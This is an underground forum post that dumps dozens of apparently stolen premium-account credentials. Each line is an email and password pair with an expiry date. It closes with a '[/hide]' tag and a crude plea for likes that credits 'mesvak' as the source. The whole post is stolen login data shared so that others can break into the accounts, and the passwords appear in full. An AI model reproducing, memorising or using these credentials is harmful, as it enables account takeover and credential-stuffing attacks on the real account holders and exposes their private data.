MES\/AK preMIUms [email protected]:007negerkinit | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:pikes123 | Expires: 2018-07-22 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:naotenhosenha | Expires: 2018-03-15 20:13:25 $$$ NRD MES\/AK preMIUms [email protected]:2181985 | Expires: 2017-09-12 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:177jrbcan | Expires: 2017-08-18 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:126392 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:superb23 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:8andthe1 | Expires: 2018-03-12 15:33:16 $$$ NRD MES\/AK preMIUms [email protected]:nobacotplz | Expires: 2019-01-28 14:37:52 $$$ NRD MES\/AK preMIUms [email protected]:won800fu | Expires: 2019-03-20 21:47:05 $$$ NRD MES\/AK preMIUms [email protected]:Gilgemic7 | Expires: 2018-10-11 05:26:05 $$$ NRD MES\/AK preMIUms [email protected]:lyfiznyc | Expires: 2018-08-16 02:47:27 $$$ NRD MES\/AK preMIUms [email protected]:dodo1907 | Expires: 2018-04-18 13:07:48 $$$ NRD MES\/AK preMIUms [email protected]:puteria5 | Expires: 2018-03-29 03:22:05 $$$ NRD MES\/AK preMIUms [email protected]:admin321 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:warrior92 | Expires: 2019-04-22 17:39:52 $$$ NRD MES\/AK preMIUms [email protected]:Pablo2305 | Expires: 2018-01-11 19:46:24 $$$ NRD MES\/AK preMIUms [email protected]:Marie8334 | Expires: 2017-12-26 05:47:03 $$$ NRD MES\/AK preMIUms [email protected]:haydhit | Expires: 2017-12-24 13:14:23 $$$ NRD MES\/AK preMIUms [email protected]:0124991790 | Expires: 2018-03-20 01:46:05 $$$ NRD MES\/AK preMIUms [email protected]:Eamoeamo1 | Expires: 2017-08-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:hallonpaj93 | Expires: 2020-02-18 20:55:53 $$$ NRD MES\/AK preMIUms [email protected]:maral12104 | Expires: 2021-05-09 05:51:03 $$$ NRD MES\/AK preMIUms [email protected]:kes34385 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:mews1963 | Expires: 2020-09-10 16:22:51 $$$ NRD MES\/AK preMIUms [email protected]:Acting1943 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:jordan02 | Expires: 2018-07-18 22:47:10 $$$ NRD MES\/AK preMIUms [email protected]:fucker22 | Expires: 2018-06-06 04:23:04 $$$ NRD MES\/AK preMIUms [email protected]:wakemeup69 | Expires: 2019-04-05 05:35:16 $$$ NRD MES\/AK preMIUms [email protected]:gotadelimao | Expires: 2018-03-15 06:37:56 $$$ NRD MES\/AK preMIUms [email protected]:anmol123 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:gec40dash8 | Expires: 2020-02-12 12:20:46 $$$ NRD MES\/AK preMIUms [email protected]:159875321 | Expires: 2018-03-03 13:44:50 $$$ NRD MES\/AK preMIUms [email protected]:vinnyp17 | Expires: 2017-04-21 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:Korn1818 | Expires: 2019-04-28 07:06:16 $$$ NRD MES\/AK preMIUms [email protected]:wales4eva | Expires: 2022-04-17 20:07:39 $$$ NRD MES\/AK preMIUms [email protected]:hitman47 | Expires: 2018-05-21 22:01:13 $$$ NRD MES\/AK preMIUms [email protected]:golmatol25823 | Expires: 2019-06-12 17:46:36 $$$ NRD MES\/AK preMIUms [email protected]:123123123 | Expires: 2018-06-19 16:45:49 $$$ NRD MES\/AK preMIUms [email protected]:delamorte | Expires: 2017-09-15 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:flammable08 | Expires: 2018-05-20 02:33:12 $$$ NRD MES\/AK preMIUms [email protected]:heroes25 | Expires: 2018-03-23 23:47:22 $$$ NRD MES\/AK preMIUms [email protected]:stamina2 | Expires: 2017-11-12 04:08:35 $$$ NRD MES\/AK preMIUms [email protected]:madethis1 | Expires: 2019-04-15 16:06:31 $$$ NRD MES\/AK preMIUms [email protected]:aiman2710 | Expires: 2018-08-16 16:18:21 $$$ NRD MES\/AK preMIUms [email protected]:chuckbass18 | Expires: 2019-04-01 14:48:41 $$$ NRD MES\/AK preMIUms [email protected]:allforcuttest | Expires: 2018-01-08 11:45:26 $$$ NRD MES\/AK preMIUms [email protected]:popyman1 | Expires: 2017-12-19 19:29:05 $$$ NRD MES\/AK preMIUms [email protected]:lolnooblol | Expires: 2019-06-11 17:00:04 $$$ NRD MES\/AK preMIUms [email protected]:Wolverine1993 | Expires: 2019-01-29 08:59:04 $$$ NRD MES\/AK preMIUms [email protected]:Ankleshwar321 | Expires: 2019-04-26 09:21:46 $$$ NRD MES\/AK preMIUms [email protected]:coolkid2119 | Expires: 2017-07-08 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:Diah8287 | Expires: 2019-02-15 10:32:19 $$$ NRD MES\/AK preMIUms [email protected]:tshudiep89 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:112912 | Expires: 2017-08-11 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:rbc63844 | Expires: 2019-06-12 21:46:25 $$$ NRD MES\/AK preMIUms [email protected]:opensesame | Expires: 2018-06-09 15:18:42 $$$ NRD MES\/AK preMIUms [email protected]:Nic562101 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:10831083 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:steel123 | Expires: 2018-03-13 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:mercy101 | Expires: 2019-06-13 08:08:46 $$$ NRD MES\/AK preMIUms [email protected]:sifra123 | Expires: 2018-08-19 15:04:43 $$$ NRD MES\/AK preMIUms [email protected]:manutd12 | Expires: 2017-08-22 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:4lt415um | Expires: 2019-06-27 15:17:22 $$$ NRD MES\/AK preMIUms [email protected]:Yasaspamod1 | Expires: 2017-10-17 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:charadedumb | Expires: 2019-04-27 12:05:42 $$$ NRD MES\/AK preMIUms [email protected]:SANDRA4645 | Expires: 2018-06-26 02:02:42 $$$ NRD MES\/AK preMIUms [email protected]:Mybabies2 | Expires: 2019-05-07 18:20:50 $$$ NRD MES\/AK preMIUms [email protected]:erik2004 | Expires: 2018-07-22 01:40:35 $$$ NRD MES\/AK preMIUms [email protected]:ashwin26 | Expires: 2018-08-21 07:54:07 $$$ NRD MES\/AK preMIUms [email protected]:tykeil504 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:Kingdoms1 | Expires: 2019-02-20 00:00:20 $$$ NRD MES\/AK preMIUms [email protected]:antonio1 | Expires: 2017-11-21 19:49:46 $$$ NRD MES\/AK preMIUms [email protected]:joshuag11 | Expires: 2018-05-01 08:55:05 $$$ NRD MES\/AK preMIUms [email protected]:vtxnet22021 | Expires: 2019-04-30 16:14:03 [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme